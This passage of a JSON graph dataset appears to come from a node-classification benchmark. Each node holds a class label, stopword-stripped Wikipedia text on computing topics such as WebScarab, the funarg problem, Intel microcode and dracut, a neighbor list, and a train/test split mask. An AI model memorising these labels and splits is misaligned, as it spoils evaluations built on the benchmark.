      7044,
      3462,
      8584,
      1417,
      4490,
      6028,
      10126,
      7572,
      5526,
      6550,
      9121,
      5026,
      11683,
      422,
      5546,
      944,
      438,
      5054,
      6086,
      4048,
      7123,
      5078,
      5082,
      5597,
      479,
      10722,
      5605,
      487,
      8169,
      494,
      1520,
      7152,
      8689,
      11248,
      6133,
      5622,
      5114,
      4095
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8585,
    "label": 4,
    "text": "WebScarab:webscarab webscarab web security application testing tool serves proxy intercepts allows people alter web browser web requests http https web server replies webscarab also may record traffic review webscarab open source tool developed open web application security project owasp implemented java could run across multiple operating systems 2013 official development webscarab slowed appears owasp zed attack proxy zap project another java-based open source proxy tool features active development webscarab official successor although zap forked paros proxy webscarab",
    "neighbors": [
      225,
      9293,
      3604,
      4725,
      119,
      4797
    ],
    "mask": "None"
  },
  {
    "node_id": 8586,
    "label": 9,
    "text": "CVAR:cvar cvar convar abbreviations console variable depending context term found may also stand client variable configuration variable type variable used many computer games computer 3d simulation engines manipulated text based command line interface within game engine often called console commonly hold configuration parameters used anything may potentially accessed and/or modified console common usage cvars server operators customize online game servers",
    "neighbors": [
      4490
    ],
    "mask": "Test"
  },
  {
    "node_id": 8587,
    "label": 9,
    "text": "Funarg_problem:funarg problem computer science funarg problem refers difficulty implementing first-class functions functions first-class objects programming language implementations use stack-based memory allocation functions difficulty arises body nested function refers directly i.e. via argument passing identifiers defined environment function defined environment function call standard resolution either forbid references create closures two subtly different versions funarg problem upwards funarg problem arises returning otherwise transmitting upwards function function call downwards funarg problem arises passing function parameter another function call one function calls another typical program execution local state caller including parameters local variables must preserved order execution proceed callee returns compiled programs local state stored call stack data structure called stack frame activation record stack frame pushed allocated prelude calling another function popped deallocated function returns function call upwards funarg problem arises calling function refers called/exited function state function returned therefore stack frame containing called function state variables must deallocated function returns violating stack-based function call paradigm one solution upwards funarg problem simply allocate activation records heap instead stack rely form garbage collection reference counting deallocate longer needed managing activation records heap historically perceived less efficient stack although partially contradicted perceived impose significant implementation complexity functions typical programs less programs functional programming languages create upwards funargs adding concerns potential overhead associated implementation furthermore approach genuinely difficult languages support garbage collection efficiency-minded compilers employ hybrid approach activation records function allocated stack compiler able deduce static program analysis function creates upwards funargs otherwise activation records allocated heap another solution simply copy value variables closure time closure created cause different behavior case mutable variables state longer shared closures known variables constant approach equivalent ml languages take approach since variables languages bound values—i.e variables changed java also takes approach respect anonymous classes allows one refer variables enclosing scope codice_1 i.e constant languages allow programmer explicitly choose two behaviors php 5.3 anonymous functions require one specify variables include closure using codice_2 clause variable listed reference includes reference original variable otherwise passes value apple blocks anonymous functions captured local variables default captured value one wants share state closures closure outside scope variable must declared codice_3 modifier case variable allocated heap following haskell-inspired pseudocode defines function composition codice_4 operator constructing new function case one argument codice_5 returns result first applying codice_6 codice_5 applying codice_8 λ function carries functions codice_8 codice_6 pointers internal state problem case exists compose function allocates parameter variables codice_8 codice_6 stack codice_13 returns stack frame containing codice_8 codice_6 discarded internal function codice_16 attempts access codice_6 access discarded memory area downwards funarg may also refer function state function actually executing however definition existence downwards funarg contained execution function creates stack frame function usually still stored stack nonetheless existence downwards funargs implies tree structure closures stack frames complicate human machine reasoning program state downwards funarg problem complicates efficient compilation tail recursion code written continuation-passing style special cases intent programmer usually function run limited stack space faster behavior may actually undesirable historically upwards funarg problem proven difficult example pascal programming language allows functions passed arguments returned results thus implementations pascal required address downwards funarg problem upwards one modula-2 oberon programming languages descendants pascal allow functions parameters return values assigned function may nested function c programming language historically avoids main difficulty funarg problem allowing function definitions nested environment every function containing statically-allocated global variables functions pointer function code describes function completely apple proposed implemented closure syntax c solves upwards funarg problem dynamically moving closures stack heap necessary java programming language deals requiring context used nested functions anonymous inner local classes declared final context used lambda expressions effectively final c lambdas closures encapsulate function pointer related variables functional languages functions first-class values passed anywhere thus implementations scheme sml must address upwards downwards funarg problems usually accomplished representing function values heap-allocated closures previously described ocaml compiler employs hybrid technique based program analysis maximize efficiency",
    "neighbors": [
      2304,
      898,
      9866,
      4877,
      10510,
      9490,
      3733,
      5783,
      2585,
      10011,
      10395,
      6558,
      3876,
      5165,
      5677,
      5040,
      435,
      5059,
      8644,
      10581,
      7386,
      10083,
      10211,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 8588,
    "label": 9,
    "text": "IMacros:imacros imacros browser based application macro recording editing playback web automation testing provided standalone application extensions mozilla firefox google chrome internet explorer web browsers developed iopus/ipswitch adds record replay functionality similar found web testing form filler software macros combined controlled via javascript demo macros javascript code examples included software running strictly javascript based macros removed later versions imacros browser extensions however users use alternative browser like pale moon based older version mozilla firefox use javascript files web based automated testing moon tester tool first created 2001 mathias roth imacros first macro recorder tool specifically designed optimized web browsers form filling april 2012 imacros acquired ipswitch imacros firefox chrome offers feature known social scripting allows users share macros scripts manner similar social bookmarking technically functions distributed web sites embedding imacro controlling javascript inside plain text link along freeware version imacros available proprietary commercial application additional features support web scripting web scraping internet server monitoring web testing addition working html pages commercial editions automate adobe flash adobe flex silverlight java applets using directscreen image recognition technology freeware version imacros contains control flow statements minor exceptions complex conditional code requires scripting available commercial version advanced versions also contain command-line interface application programming interface api automate complicated tasks integrate programs scripts imacros api called scripting interface scripting interface imacros scripting edition designed component object model com object allows user remotely control script imacros browser internet explorer firefox chrome windows programming scripting language",
    "neighbors": [
      1664,
      9728,
      5380,
      3462,
      8262,
      11559,
      4171,
      5356,
      7982,
      7343,
      5968,
      7983,
      8596,
      9780,
      5078,
      5622,
      9241
    ],
    "mask": "Train"
  },
  {
    "node_id": 8589,
    "label": 4,
    "text": "Johan_Helsingius:johan helsingius johan julf helsingius born 1961 helsinki finland started ran anon.penet.fi internet remailer anon.penet.fi one popular internet remailers handling 10,000 messages day server first kind use password-protected po box system sending receiving e-mails 1980s system administrator central finnish news node well founding members finnish unix user group 1994 interview wired said created service important able express certain views without everyone knowing 1996 announced remailer would shut due legal pressure church scientology scientology officials upset users helsingius service sending information church obtained court order force reveal identity many site users announcing service closure wrote close remailer time legal issues concerning internet finland yet undefined american electronic frontier foundation eff internet civil rights initiative reported continuously incidents concerning anon.penet.fi collected donations cover legal costs helsingius involved court case settle whether finnish law could force reveal identity anon.penet.fi users closing anon.penet.fi led outbreak outrage solidarity helsingius throughout internet order protect freedom internet helsingius went help found eunet finland part team people established first internet link ussr later eunet acquired qwest communications soon moved kpnqwest qwest joint venture kpn international julf became chief technology officer cto kpnqwest internet entrepreneur serving board various companies e.g basen based finland helsingius lives amsterdam netherlands helsingius studied music traveled widely interests include active sports like mountain climbing aviation",
    "neighbors": [
      5955,
      2885,
      3350,
      7239
    ],
    "mask": "None"
  },
  {
    "node_id": 8590,
    "label": 3,
    "text": "Intel_Microcode:intel microcode intel microcode microcode runs inside x86 processors made intel since p6 microarchitecture introduced mid-1990s microcode programs patched operating system bios firmware workaround bugs found cpu release intel originally designed microcode updates processor debugging design testing dft initiative following pentium fdiv bug patchable microcode function took wider purpose allow in-field updating without needing product recall p6 later microarchitectures lists x86 instructions internally converted simpler risc-style micro-operations specific particular processor stepping level pentium pro micro-operation 72-bits wide 118-bits wide includes two source fields one destination field ability hold 32-bit immediate value pentium pro able detect parity errors internal microcode report via machine check architecture micro-operations consistent format three source inputs two destination outputs processor performs register renaming map inputs real register file rrf execution out-of-order execution used micro-operations instructions represent may appear order development pentium pro several microcode fixes included a2 b0 steppings pentium ii based p6 pentium pro additional micro-operations added support mmx instruction set several cases microcode assists added handle rare corner-cases reliable way pentium 4 126 micro-operations flight time micro-operations decoded stored execution trace cache 12,000 entries avoid repeated decoding x86 instructions groups six micro-operations packed trace line complex instructions exception handling result jumping microcode rom development pentium 4 microcode accounted 14 processor bugs versus 30 processor bugs development pentium pro intel core microarchitecture introduced 2006 added micro-operations fusion common pairs instructions including comparison followed jump instruction decoders core convert x86 instructions microcode three different ways intel hyper-threading implementation simultaneous multithreading microcode rom trace cache instruction decoders shared micro-operation queue shared mid-1990s facility supplying new microcode initially referred pentium pro stepping data file bios update feature intended user mode applications make bios interrupt call supply new bios update data block bios would partially validate save nonvolatile bios memory could supplied installed processors next boot intel distributed program called codice_1 renamed codice_2 could run dos collections multiple microcode updates concatencated together numerically numbered extension codice_3 codice_4 processor boots using set microcode held inside processor stored internal rom microcode update populates separate sram set match registers act breakpoints within microcode rom allow jumping updated list micro-operations sram match performed microcode instruction pointer uip match registers match resulting jump corresponding destination microcode address original p6 architecture space sram 60 micro-operations multiple match/destination register pairs takes one processor instruction cycle jump rom microcode patched microcode held sram match registers consist microcode match address microcode destination address processor must protection ring zero order initiate microcode update cpu symmetric multiprocessing arrangement needs updated individually update initiated placing address codice_5 register setting codice_6 executing codice_7 write model-specific register intel distributes microcode updates 2,048 2 kilobyte binary blob update contains information processors designed checked result cpuid instruction structure 48-byte header followed 2,000-bytes intended read directly processor updated block encoded differently majority 2,000 bytes used configuration program sram micro-operation contents much smaller final determination validation whether update applied processor performed decryption via processor microcode update specific particular cpu revision designed rejected cpus different stepping level microcode updates encrypted prevent tampering enable validation pentium two layers encryption precise details explicitly documented intel instead known less ten employees microcode updates intel atom nehalem sandy bridge additionally contain extra 520-byte header containing 2048-bit rsa modulus exponent 17 decimal micro architecture example processors supplied length functional length suspected encoding",
    "neighbors": [
      8834,
      7173,
      6924,
      3470,
      6926,
      7313,
      3352,
      2847,
      8355,
      10796,
      9391,
      7218,
      8125,
      6463,
      5312,
      6339,
      6596,
      2638,
      5073,
      7508,
      477,
      3175,
      1515,
      9707,
      6639,
      499,
      3317,
      1915
    ],
    "mask": "Test"
  },
  {
    "node_id": 8591,
    "label": 7,
    "text": "Cloud_access_security_broker:cloud access security broker cloud access security broker casb sometimes pronounced cas-bee on-premises cloud based software sits cloud service users cloud applications monitors activity enforces security policies casb offer variety services including limited monitoring user activity warning administrators potentially hazardous actions enforcing security policy compliance automatically preventing malware casb may deliver security management broadly speaking security prevention high-risk events whilst management monitoring mitigation high-risk events casbs deliver security must path data access user cloud architecturally might achieved proxy agents end-point device agentless fashion without requiring configuration device agentless casb allow rapid deployment deliver security devices company-managed unmanaged byod agentless casb also respect user privacy inspecting corporate data agent-based casb difficult deploy effective devices managed corporation agent-based casb typically inspect corporate personal data casbs deliver management may use apis inspect data activity cloud alert risky events fact another management capability casb inspect firewall proxy logs usage cloud applications api-only casbs cloudlock offer management using apis provided major saas applications contrast multi-mode casbs e.g netskope ciphercloud offer management security multi-mode casbs may also offer zero-day capabilities protect threats known unknown",
    "neighbors": [
      704,
      4194,
      164,
      8998,
      4236,
      6834
    ],
    "mask": "None"
  },
  {
    "node_id": 8592,
    "label": 7,
    "text": "Scalr:scalr scalr hybrid cloud management platform managing private public cloud platforms large enterprises scalr helps enterprises deliver self-service cloud computing maintaining policies around cost automation security compliance scalr founded sebastian stadil 2007 organizational model help standardize processes across teams later became hybrid cloud management platform incorporated 2011 grown rapidly",
    "neighbors": [
      6018,
      1539,
      8451,
      5770,
      6027,
      4236,
      10893,
      526,
      911,
      272,
      1935,
      4623,
      405,
      2965,
      2328,
      4377,
      8986,
      10265,
      5662,
      11038,
      5666,
      6307,
      9766,
      39,
      5159,
      2217,
      6444,
      7983,
      8495,
      3121,
      5681,
      9906,
      7352,
      10681,
      11070,
      448,
      2496,
      4289,
      8515,
      10820,
      3269,
      11201,
      1224,
      8520,
      4683,
      4429,
      590,
      1102,
      7248,
      1362,
      467,
      5202,
      9682,
      7512,
      10200,
      6618,
      6367,
      4194,
      11646,
      3428,
      5732,
      6632,
      1001,
      10090,
      2795,
      3819,
      7660,
      8044,
      8571,
      2170,
      5499,
      253,
      8446,
      8191
    ],
    "mask": "None"
  },
  {
    "node_id": 8593,
    "label": 7,
    "text": "Brutus_cluster:brutus cluster brutus central high-performance cluster eth zurich introduced public may 2008 new computing cluster called euler announced opened public may 2014 brutus heterogeneous system containing 11 different kinds compute nodes total brutus contains 19,872 cores plus hundreds cluster file servers login nodes management nodes peak performance brutus slightly 200 teraflops 200 × 10 floating-point operations per second thanks heterogeneous nature brutus tackle wide range applications",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 8594,
    "label": 9,
    "text": "Transterpreter:transterpreter transterpreter computer software interpreter transputer virtual machine programming language occam-π occam-pi portable runtime kroc compiler designed education research concurrency robotics transterpreter developed university kent transterpeter made possible easily run occam-π programs platforms lego mindstorms rcx arduino ia-32 sparc mips cell operating systems linux macos windows dos",
    "neighbors": [
      7234,
      5380,
      6311,
      6797,
      823,
      7983,
      1399
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8595,
    "label": 3,
    "text": "The_Great_Giana_Sisters:great giana sisters great giana sisters 1987 platform game developed german studio time warp productions published rainbow arts known controversial production history similarities nintendo platform game super mario bros. prompted legal pressure producers game scroll screen melody game composed chris hülsbeck popular commodore 64 soundtrack player takes role giana referred gianna scrolling intro also intended name typo made cover art developers went rather cover remade girl suffers nightmare travels 32 stages full monsters collecting ominous diamonds looking sister maria player wins final battle giana awakened sister great giana sisters 2d side-scrolling arcade game player controls either giana sister maria game supports alternating 2 players second player taking control maria level contains number dream crystals gives points collected order make game high score extra life gained collecting 100 dream crystals extra lives also found form hidden lollipop items enemies defeated jumping shooting obtaining relevant powerups enemies include owls rolling eyeballs flesh-eating fish deadly insects fire wheel transforms giana punk ability crush rocks jumping beneath lightning bolt awards giana dream bubbles single projectile shot double lightning gives ability shoot recoiling projectiles strawberries gives ability shoot homing projectiles one defensive item game water-drop protects giana fire number special items also triggered affects entire screen clock freezes enemies on-screen magic bombs kills enemies items found item blocks scattered around stages two types stages game overworld underground stage overworld stages feature green scenery pipe-shaped objects along bottomless pits giana avoid underground stages feature additional hazards water fire well bosses total 32 stages game hidden warp-blocks found jump portions game great giana sisters programmed armin gessert graphics manfred trenz soundtrack composed chris hülsbeck label time warp production inc first original game version released 1987 commodore 64 shortly released amiga amstrad cpc atari st license held black forest games developed sequel according several urban legends nintendo opened lawsuit case time warp productions rainbow arts nintendo saw direct copyright infringement new game super mario bros. fact never lawsuit neither nintendo german programmers claim privy lawsuits myth created shortly game taken stores nintendo later admitted influenced stop sales directly games several factors influenced stop sales game including conspicuous similarities general gameplay first level great giana sisters nearly identical layout first stage found nintendo super mario bros. immediate similarity super mario bros. ensured great giana sisters quickly noticed public video game industry nintendo urged makers great giana sisters withdraw game sale arguing obvious copyright infringement time warp productions rainbow arts immediately stopped production time game began vanishing stores difficulty obtaining copies game led sought collector items game ported numerous systems since release planned port zx spectrum reviewed magazines though eventually cancelled due legal pressures 1993 dutch publisher sunrise released version msx2 programmed jan van valburg unofficially game cloned windows dos linux mac os x amigaos 4 netbsd aros morphos symbian os unofficial clone commodore 64 version also made nintendo ds 2009 mobile version game titled simply giana sisters released android phones appears ouya discover store launch upon release great giana sisters received strong critical praise acclaim gaming magazines across europe zzap 64 described game amazing concluded overall opinion great giana sisters fabulous compelling constantly rewarding arcade adventure powerplay review stated felt game live standards set super mario bros. still achieves entertaining pleasure despite never seeing release zx spectrum version gained favorable reviews spectrum-based magazines crash noted game highly addictive great fun play plenty hidden passages surprise features keep hooked weeks great giana sisters gained strong cult following years citing strong soundtrack unique charm online web resource lemon64 staff member jan egil romestrand remarked game must-have serious c64 games collector 2012 ranks 6th place top 10 games list gamebase 64 chris hülsbeck soundtrack game become one popular video game soundtracks time received 50 remixes popular music arrangement resource remix64 music great giana sisters featured live orchestra concert symphonic shades held cologne germany august 23 2008 arrangement made jonne valtonen performed wdr radio orchestra concert first video game orchestra concert broadcast live radio concert recording received album release 2009 album print still bought digitally amazon since 2009 endorsement manfred trenz fan-made open-source remake c64 version called openggs development hosted sourceforge remake ported mobile devices like pandora 2015 shortly release great giana sisters time warp began developing sequel announced giana 2 arther martha future world new game futuristic setting due trouble caused legal pressure coming nintendo deemed risky small developer produce game associated giana sisters brand time warp renamed game hard n'heavy changed game protagonists robots rather giana sisters hard n'heavy released commodore 64 amiga 1989 april 2009 publisher dtp entertainment developer spellbound interactive owner game intellectual property released new giana sisters game europe graphical update nintendo ds titled giana sisters ds released australia game features all-new levels gameplay elements recreation original game levels unlocked giana sisters ds released north america february 2011 publisher destineer though official website listed available several retailers walmart newegg.com giana sisters 2d hd remake nintendo ds game released october 2015 pc july 2012 black forest games started kickstarter campaign new installment great giana sisters originally titled project giana later retitled describing project grandchild great giana sisters kickstarter funded successfully netting 186,158 goal 150,000 game described direct sequel giana sisters ds features music great giana sisters original composer chris hülsbeck cooperation fabian del priore swedish sid metal band machinae supremacy giana sisters twisted dreams released october 23 2012 pc later releases xbox live arcade playstation network nintendo eshop possibly ouya giana sisters dream runners multiplayer focused platform game released august 2015 pc playstation 4 xbox one received negative reviews",
    "neighbors": [
      6797,
      9166,
      823
    ],
    "mask": "Test"
  },
  {
    "node_id": 8596,
    "label": 4,
    "text": "Ipswitch,_Inc.:ipswitch inc. ipswitch management software developer small medium sized businesses company founded 1991 headquartered burlington massachusetts operations atlanta alpharetta augusta georgia american fork utah madison wisconsin galway ireland ipswitch sells products directly well distributors resellers oems united states canada latin america europe pacific rim roger greene founded ipswitch 1991 apartment without venture capital funding bank financing company became profitable second year first product ipswitch produced gateway allowed novell inc. ipx networking protocol connect internet protocol 1994 ipswitch launched imail server first product available e-commerce site open market mid-1990s company value-added reseller spyglass mosaic browser 1996 company released beta version whatsup gold commercial version earlier shareware product ws_ping 2008 ipswitch acquired wisconsin-based software producer standard networks inc. product moveit shortly acquisition ipswitch split operations three divisions secure file transfers network management messaging collaboration company acquired salt lake city-based hourglass technologies 2009 following year company acquired compliance system system log analysis software producer dorian software december 2012 ipswitch acquired waldorf germany-based performance testing company iopus known product imacros web-browser extension 2015 ipswitch merged network monitoring file transfer divisions created partnersynergy program ipswitch opened support operations center galway ireland march 2016.. 28 march 2019 ipswitch signed agreement progress software corporation whereby progress acquire ipswitch completion purchase 225 million announced progress may 1st company commits 5 percent profits variety community investment programs designed support interests employees 2010 ipswitch inc. ’ network management division claimed company achieved 5,000 downloads whatsup gold engineer ’ toolkit first month release partnership trees life international planted 5,000 trees one download",
    "neighbors": [
      5472,
      8588
    ],
    "mask": "Test"
  },
  {
    "node_id": 8597,
    "label": 8,
    "text": "SOALIB:soalib service-oriented architecture library soalib used distribute reusable service-oriented architecture soa software manner similar computing libraries soa consists loosely coupled interoperable services use messaging based simple object access protocol soap representational state transfer rest library computing set compiled modules tested ready reuse similar concept used soa whatever technology used develop service also distributed library form java-based soa library may distributed web archive war enterprise archive ear file formats c c++ .net applications may distributed shared object unix linux dynamic link library windows executable file service-oriented architecture usually tied redesign entire software system determines decompose single software unit loosely coupled components loosely coupled component acts interoperable service task enormous may take significant amount time atomic level atom defined single loosely coupled service self-contained services reusable regardless application example matter built atoms yet material things different atomic level however appear uniform similarly software built loosely coupled services serve atoms redesign process loose coupling difficult determine opposite true means easier build complete software system using available loosely coupled services building service-oriented architecture libraries loosely coupled service complex applications developed making use services new applications depend loosely coupled services long one sticks loose coupling final application also loosely coupled true final application depends many hierarchical loosely coupled systems remains loosely coupled hierarchy based atomic services building soa requires loose coupling services starting point termed atomic services first step determine atomic services build atomic services reuse large number atomic services could created upon composite services built composite service services built upon atomic services consideration cross platform important presently many ways make services host platform platform independent examples building services java jvm available host server run service alternatives building applications full compliance ansi c/c++ none components code reliant upon third party libraries typically means building c/c++ applications using gnu tools gnu c compilers gnu compilers ported operating systems platforms another alternative use c .net language web service common language runtime ported target operating system platform many options available common approaches platform independence already mentioned scope library limited support databases composite integration services built take advantage loosely coupled atomic services operate databases support database access added metadata layer added map various kinds data format database uniform set data types equal meaning databases difficult part time jdbc odbc ado standards database drivers already part task database may store data different formats data may encrypted may stored little endian endianness others big endian therefore data must transformed point services done runtime due changing nature data databases different therefore single api take advantage features databases therefore services use database specific features well multi-vendor databases supported services added database may synchronize database become possible data passed data layer data represented intermediate form intermediate form may native form standards-based usually native form portable means representing xml may best approach data sizes tend large incremental change detection also added libraries must secure libraries soa implementation web services ws-security ws-policy ws-type standards compliance based rest protocols follow respective standards libraries must least support ssl interoperability one important reasons soa important soa library must also include required api could used rapid platform specific development atomic service loosely coupled service independent assumptions absolutely predictable dependencies services atomic services example disk file operation may considered atomic service operations performed service read write delete append file operations information disk file would need full path file possibly access parameters like username password would dependencies composite service designed based atomic services still loosely coupled atomic service integrated service built together make larger soa application building layer layer large soa application may created remain loosely coupled keep integrated services loosely coupled would require services built atomic composite services soon integrated service uses another service somewhat tightly coupled entire service application becomes tightly coupled analogous atomic structures becoming charged one electron missing reason using third party services designer must ensure service remains loosely coupled following hierarchy service-oriented applications designed ideally following soa application design approach cases loose coupling may possible due reliance hardware mechanical systems specialized instruments example service built move robotic arm monitor industrial generators emergency hospital equipment tightly coupled services required tightly coupled services top hierarchy service may reuse tightly coupled services possible derived services based tightly coupled services derived services also become tightly coupled system designed limited scope purpose application",
    "neighbors": [
      10020,
      2183,
      3561,
      7753,
      4107,
      5612,
      5677,
      2804,
      3573,
      5492,
      823,
      6357,
      2045,
      479
    ],
    "mask": "None"
  },
  {
    "node_id": 8598,
    "label": 9,
    "text": "Tea_(programming_language):tea programming language tea high level scripting language java environment combines features scheme tcl java tea proprietary language interpreter subject non-free license project called destea released language :tea cpan provides alternative generating java code based tea code teaclipse open source compiler uses javacc-generated parser parse compile tea source proprietary tea bytecode",
    "neighbors": [
      9345,
      10083,
      2281,
      5677,
      5872,
      9330,
      692,
      9780,
      479
    ],
    "mask": "Validation"
  },
  {
    "node_id": 8599,
    "label": 2,
    "text": "Bryan_Cantrill:bryan cantrill bryan m. cantrill born 1973 american software engineer worked sun microsystems later oracle corporation following acquisition sun left oracle july 25 2010 become vice president engineering joyent. transitioning chief technology officer joyent april 2014 departure july 31 2019 cantrill born vermont later moving colorado attained rank eagle scout studied computer science brown university spending two summers qnx software systems kernel development upon completing b.sc 1996 immediately joined sun microsystems work jeff bonwick solaris performance group 2005 bryan cantrill named one 35 top young innovators technology review mit magazine cantrill included tr35 list development dtrace function os solaris 10 provides non-invasive means real-time tracing diagnosis software sun technologies technologists including dtrace cantrill also received infoworld innovators award year 2006 dtrace trouble-shooting software sun chosen gold winner wall street journal 2006 technology innovation awards contest 2008 cantrill mike shapiro adam leventhal recognized usenix software tools user group stug award provision significant enabling technology together shapiro leventhal cantrill founded fishworks stealth project within sun microsystems produced sun storage 7000 unified storage systems left oracle july 25 2010 become vice president engineering joyent announced transition chief technology officer joyent april 2014 held position announcing departure july 31 2019 member acm queue editorial board online technical discussion solaris linux kernel developer david s. miller 1996 cantrill responded miller lengthy comment one-line reply ever kissed girl 2015 discussion concerning ben noordhuis departure node.js project cantrill said 1996 comment continues cited decades later wrote regrets sending response called stupid cantrill left oracle 2010 used strong analogies multiple times describe point view oracle business behavior cantrill announced fisl 2012 strong preference permissive open source software licenses copyleft licenses calling copyleft gpl license family anti-collaborative viral",
    "neighbors": [
      9665,
      2123,
      10668,
      7983,
      11506,
      6803,
      10643,
      792,
      8671
    ],
    "mask": "Test"
  },
  {
    "node_id": 8600,
    "label": 5,
    "text": "Carrier_interferometry:carrier interferometry carrier interferometry ci spread spectrum scheme designed used orthogonal frequency-division multiplexing ofdm communication system multiplexing multiple access enabling system support multiple users time frequency band like mc-cdma ci-ofdm spreads data symbol frequency domain data symbol carried multiple ofdm subcarriers unlike mc-cdma uses binary-phase hadamard codes code values 0 180 degrees binary pseudonoise ci codes complex-valued orthogonal codes simplest case ci code values coefficients discrete fourier transform dft matrix row column dft matrix provides orthogonal ci spreading code spreads data symbol spreading achieved multiplying vector data symbols dft matrix produce vector coded data symbols coded data symbol mapped ofdm subcarrier via input bin inverse fast fourier transform ifft block contiguous subcarriers may selected achieve better frequency diversity non-contiguous subcarriers distributed wide frequency band used guard interval cyclic prefix cp added baseband ci-ofdm signal signal processed radio front-end convert rf signal transmitted antenna significant advantage ci-ofdm ofdm techniques ci spreading shapes time-domain characteristics transmitted waveform thus ci-ofdm signals much lower peak-to-average-power ratio papr crest factor compared types ofdm greatly improves power efficiency reduces cost power amplifiers used radio transmitter ci-ofdm receiver removes cyclic prefix received ci-ofdm transmission performs ofdm demodulation dft e.g. fft typically used ofdm receivers ci-spread symbol values collected respective subcarriers inverse-mapping process may equalized compensate multipath fading processed spatial demultiplexing ci de-spreader performs inverse-dft spread symbols recover original data symbols since ci coding shape time-domain characteristics transmitted waveform used synthesize various waveforms direct-sequence spread spectrum frequency shift key 4 signals advantage receiver select time-domain frequency-domain equalization based much scattering occurs transmission channel rich scattering environments frequency-domain equalization using ffts requires less computation conventional time-domain equalization performs substantially better ci introduced steve shattil scientist idris communications u.s. pat 5,955,992 filed february 12 1998 first many papers april 1999 concept inspired optical mode-locking frequency-domain synthesis using resonant cavity produces desired time-domain features transmitted optical signal radio systems users share subcarriers use different orthogonal ci codes achieve carrier interference multiple access cima via spectral interferometry mechanisms many applications ci principles published dozens subsequent patent filings conference papers journal articles ci frequency-hopped ofdm described international patent application wo 9941871 ci optical fiber communications mimo described us 7076168 us 6331837 describes spatial demultiplexing using multicarrier signals eliminates need multiple receiver antennas ci coding reference signals disclosed us 7430257 use ci linear network coding onion coding disclosed us 20080095121 random linear codes based natural multipath channel used encode transmitted signals routed nodes multi-hop peer-to-peer network similarity antenna array processing ci processing recognized since earliest work ci ci combined phased arrays continuous phase change subcarriers causes array ’ beam pattern scan space achieves transmit diversity represents early form cyclic delay diversity combinations ci coding mimo precoding studied idea using ci mimo pre-coded distributed antenna systems central coordination first disclosed provisional patent application 2001 ci-based software-defined radio sdr implemented four different protocol stacks developed idris 2000 described us 7418043 spread-ofdm spreading performed across orthogonal subcarriers produce transmit signal expressed x fsb f inverse dft spread-ofdm code matrix b data symbol vector inverse dft typically employs over-sampling factor dimension kxn k n number time-domain samples per ofdm symbol block whereas dimension spread-ofdm code matrix nxn receiver received spread-ofdm signal expressed r hfsb h represents channel matrix since use cyclic prefix ofdm changes toeplitz-like channel matrix circulant matrix received signal represented r fλffsb relationship h fλf definition circulant matrix λ diagonal matrix whose diagonal elements correspond first column circulant channel matrix h. receiver employs dft typical ofdm produce λsb trivial case identity matrix gives regular ofdm without spreading received signal also expressed r fλff λf b λf c circulant matrix defined c fλf λ circulant ’ diagonal matrix thus received signal r written r fλλfb fλλfb signal receiver dft λλfb spreading matrix include pre-equalization diagonal matrix e.g. λ λ case zero-forcing equalization performed receiver dft ofdm demodulator inverse-dft ci de-spreader simplest case ci-ofdm spreading matrix f i.e. λ ci spreading matrix nxn dft matrix since ofdm ’ over-sampled dft kxn k n basic ci spreading matrix performs like sinc pulse-shaping filter maps data symbol cyclically shifted orthogonally positioned pulse formed superposition ofdm subcarriers versions ci produce alternative pulse shapes selecting different diagonal matrices λ",
    "neighbors": [
      8160,
      3140,
      1320,
      2920,
      2994
    ],
    "mask": "Test"
  },
  {
    "node_id": 8601,
    "label": 3,
    "text": "Mikie:mikie mikie 1984 arcade game produced konami object game guide student named mikie around school classroom locker room collect hearts make letter girlfriend mandy chased various members school staff teachers coaches cafeteria chefs defend game character either head-butt throw basketballs school members briefly stun push students rear end find hearts desks game starts mikie classroom mikie must bump students seats collect hearts 're sitting simultaneously avoiding classroom teacher hearts collected player allowed leave room enter school corridor school corridor mikie chased janitor classroom teacher follows outside way gain access rest school building room representing different challenge level mikie cued proper door enter large flashing opening door result mikie punched coiled boxing glove hairy foot stunning one doors however contains scantily clad girl opening door worth 5,000 points mikie also pick extra points picking lunch boxes opening grate contains burger soda addition head-butting enemies janitor classroom teacher also stunned slamming doors faces second room locker room objective break lockers get hearts pursued janitor cook classroom teacher addition head-butting three bins basketballs located around room mikie pick throw using action button bin holds three basketballs room three cafeteria mikie pursued two cooks classroom teacher one cook stands top room occasionally throws leg meat directly mikie table roasts 3 per table mikie hurl enemies room four sees student dance studio must avoid dancing girls stun well dance instructor yet classroom teacher final stage mikie avoiding football players garden outside school guarding hearts must collect attempting reach girlfriend mandy mikie initially underwent location testing japan international title graphics high school theme would used game overseas releases however konami chose release mike japan due game premise protagonist sneaking school incidents school violence time result alternative version produced japanese arcades titled replaces school setting workplace classroom first level becomes office teacher manager dance studio third level becomes ol office levels hallway gym restaurant outdoor garden mostly unchanged aside graphical modifications football players final level instead security guards game soundtrack features chiptunes rendition beatles songs hard day night twist shout permission granted jasrac japan license displayed instruction card printed circuit board revised version game titled high school graffiti mikie provided less violent action mikie physical attack changed head butt paralyzing shout death animation changed rolling around floor sobbing contrition glass jars mikie head butt three times retrieve heart inside replaced bundles three hearts providing effect without requiring player character head butt glass first level writing blackboard reads failure teaches success instead e=mc2 mikie shout effect classroom teacher completed step loops game version speed enemy characters increases even gaining new abilities mikie ported various home computers ocean software subsidiary imagine software versions released amstrad cpc acorn electron bbc micro commodore 64 zx spectrum sg-1000 version shinnyū shain tōru-kun also released exclusively japan sega",
    "neighbors": [
      768,
      8034,
      9006
    ],
    "mask": "Test"
  },
  {
    "node_id": 8602,
    "label": 3,
    "text": "Dracut_(software):dracut software dracut event-driven initramfs infrastructure dracut tool used create initramfs image copying tools files installed system combining dracut framework usually found /usr/lib/dracut/modules.d unlike existing initramfses dracut framework attempts little hard-coded initramfs possible initramfs basically one purpose—mounting root file system boot process transition real rootfs driven device availability therefore instead hard-coded scripts various things dracut initramfs depends udev create symbolic links device nodes rootfs device node appears mounts switches root helps keep time required initramfs things like 5-second boot made impossible result existence initramfs initramfs generation functionality dracut provided generator modules sourced main dracut tool install specific functionality initramfs live modules subdirectory use functionality provided dracut-functions work currently dracut supports booting btrfs dm raid md raid lvm2 device mapper multipath i/o dm-crypt cifs fcoe iscsi nbd nfs dracut-019 june 2012 introduced ability use systemd process 1 initramfs dracut available official repository distros including dracut default initramfs creation tool opensuse many others",
    "neighbors": [
      4616,
      3082,
      5139,
      10780,
      10785,
